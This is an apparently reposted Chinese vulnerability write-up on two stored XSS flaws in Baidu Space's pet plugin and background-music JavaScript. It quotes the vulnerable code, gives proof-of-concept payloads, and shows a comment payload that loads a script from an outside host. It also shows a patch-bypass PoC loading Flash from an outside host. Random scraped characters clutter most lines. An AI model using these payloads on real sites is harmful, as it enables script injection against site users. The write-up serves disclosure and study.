百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
" e5 j" F. Z/ }& N" k
. G8 E. [' k2 M* b7 N1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. " @3 C8 g1 L7 D1 O- g& ^1 s# b
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
: E9 y$ H7 J, C$ ~9 r, R$ V4 w, A( U( S3 |6 ^3 H2 \
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
5 H s6 p: k/ c. ?( f* h. o其中BdUtil.insertWBR为 / H2 N! ]! m& b$ a0 Z" H1 v
function(text, step) {
' V8 }9 d) y, f7 s0 N) T var textarea = textAreaCache || getContainer(); , s5 o& V1 ?6 i) ^, d. w7 O* h1 f
if (!textarea) {
. f7 C$ r0 ^' j' q( T4 @5 I) H return text; 0 B2 R: x8 ]* \3 R- H
}
% h7 ^/ y. J; H* M+ K textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); * B/ B! f' m2 C0 C+ i+ _' W3 N
var string = textarea.value;
( u( z% {; `4 O$ Z/ z var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi"); + S* e9 z' z b" V* {
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); * }% ]& K) b/ D; w I( a
return result;
3 G6 {3 j7 e- T; g}
& {% f8 \+ z4 z7 j8 T7 K3 S在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. $ G- e5 x8 Y; I4 w- g# _& S
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> ' |; G9 v- c0 E, H! I1 s( ?
6 e9 W% i" T; d/ e- y: A* f5 u
二:creatbgmusic() Dom-Xss Bug " U& y7 R7 s3 a* G: F3 m3 @
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
- V5 n: g4 o: A& v8 `/ X& |+ K
9 L8 L6 a! E/ v. Y# m在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
, k f, D3 m; c1 X$ |) k
8 H: l) H) a6 j8 k% |! ~7 gfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ; ]; I+ z n8 a. x
//传入的murl赋值到bgmusic1和bgmusic2中
9 I' X6 u3 {6 b2 R) U //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 # D, o) l5 z6 |2 R$ o
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; & ]! J4 ~2 T/ \: r% t
if (musicnum <= 1) { $ W0 {( H: U/ a; B+ A C
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
- [8 k0 u, Q/ Y* @% y9 k) H! n" n } 4 F4 l/ p9 V! s! b3 H, m3 ?
bgmusic1 += "</OBJECT>"; 4 `/ `8 \8 o2 f! @" b# W4 e
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; 1 J& R; i+ i) {" k
if (musicnum <= 1) { , q$ Y R U& G7 l3 S5 P/ ^5 h6 |
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; & o! g) p5 H3 o+ \9 M" L, B' i6 |
}
& p0 X8 x: s) E* w+ u3 ? bgmusic2 += "> </EMBED>";
; k* V1 `) i$ a( n var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
. f4 [9 W! |7 \" t var bgmus = detectWMP(); , D" x& o' c7 P) Y6 p
if (functype == "FckMusicHelper") {
& c3 B2 s: z5 v: y# O if (bgmus.installed) { & c1 @, ?2 T1 {! h
if (bgmus.type == "IE") { 1 i. Z8 R4 L- L' V" d- m, U2 _( i6 Q
return bgmusic1;
k: A% N' m' c+ E1 u } else if (bgmus.type == "NS") {
8 w: c9 }7 d* U: S return bgmusic2;
" D5 b# e! ^) r# }' z. }. p } + Y1 \& r- ~. L
} else { 5 T7 n& i4 H: R% I
return bgmusic3;
. C% \/ R9 F' C( E/ b) w. G# U } - B X. m+ Y$ Q! y% c5 D
} else { 1 a8 s4 W! v# x3 }$ Z
if (bgmus.installed) {
/ G) A. e3 \( ?. _) ?5 b7 H, I //document.write 直接输出bgmusic变量 导致xss 0 q5 ?* L1 _+ _7 L/ z7 c" F
if (bgmus.type == "IE") { 5 f$ k$ E* l1 U& V: n) ~9 H) ]
document.write(bgmusic1); D" }9 J p: N8 T" u# h
} else if (bgmus.type == "NS") {
3 d; S3 p8 ]' V% k7 H document.write(bgmusic2); 0 K% v( @, m5 p: O
} 1 O7 [8 A _ I% D4 b" t9 X. [
} else {
3 p3 t7 ]% H0 ^/ Q# Q document.write(bgmusic3); + n* C& D& u. o+ h/ r$ F7 x
} 5 A- Q. D$ f& V* e) Q( x
return "";
3 ~( P6 U. u$ k1 i4 m8 [- y }
/ v( c1 ]; W ^* _}
' ?- Y% A. x. G6 T8 {5 H5 a" o! l7 Q
6 F7 s) F( k6 Y在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
* B0 }; y" o, s! z" D, x* Z0 Y6 H c V9 w
function initBlogTextForFCK(){ ) D+ C$ f' U3 b2 `1 k
//fck init music
; G0 P7 q( a* ]if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
# q" r2 q1 e" Z# M( Avar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
3 J' K# A) P# ^7 g- }1 E$ qvar isAutoPlay=true; " Y$ }. N) v q2 G
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. 8 U8 W4 X0 ?4 @) L7 E& p K! T
var img=imgBox;
2 ~! o G: G0 A$ |, g* I1 Q if(img.getAttribute(’rel’)){
+ E1 R- o0 p/ Q; f# T! P, k/ F& \* Z var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
( u2 N) J" R7 z/ a9 S var musicDiv = document.createElement("SPAN"); a* S9 x, }9 P, B7 e$ p
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
' L+ v: V a, U+ m: J1 C
+ [4 u0 ~$ G% W" P; E( L ..........................
- F. X: {- U% P: H4 d
- y3 u2 S' v2 P1 o H1 x& Q b' c2 X3 F //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. ! y7 m! k+ w0 r+ R) y& i
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ; _) E8 Y% ^2 B2 k8 k$ A8 Z
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
9 r: K2 z, W2 M+ f) b; h9 t musicDiv.innerHTML=shtml; . c$ |" M! [$ h+ B/ q6 t( A& y
i--;n--;
! R+ _/ b/ Z/ e* L) g7 D } : E3 M0 V' S+ t) G% {$ `
} ' g. B2 [1 v6 @4 W- w
5 |) i$ U9 w5 L) P& L% v0 N从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. " `4 j3 R- c% L
0 ]$ t+ H3 N: K
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> 7 V5 W# `) }9 d$ J
/ M8 a% W, e; Z/ D. x( q! ]* d
等待官方补丁
4 u2 d+ X. b3 j* M* b+ |( [, m6 U. W) [
update 2010年5月13日 " p1 I) f/ ]' {5 ^% u, f+ z/ P
/ Z0 ?0 T+ b: ]1 F. ~: ]# t% L
官方补丁: * b' E( a% [' i( p
Z: n' w) k/ b+ Q! ?
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 2 U1 `. [6 ]$ D9 W" {. I
改为:
( m5 m7 |' w }4 ovar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); ) D3 H6 h, @9 [6 Q4 v
6 `* j: q. v; T( }6 \update 2010年5月13日 21:50:37
) O8 z3 L J/ T
; t/ s8 H- S2 w/ _& @* O' b补丁存在漏洞 没有过滤" 可以继续跨: : V! S8 m/ Q0 \3 l8 x2 r
4 }, p0 O6 m- n i7 y
NEW POC: : e, A% @: b% H* \: ?
: P8 I; R! H4 {% h<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" 1 Y! C3 g4 I, ?5 \. Q2 `' }6 u# T
% P) Z' F- m7 T: _allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
w9 `- V5 a+ f9 [0 x# \! R6 Z , B( s F- o+ k" l3 s- D+ T
|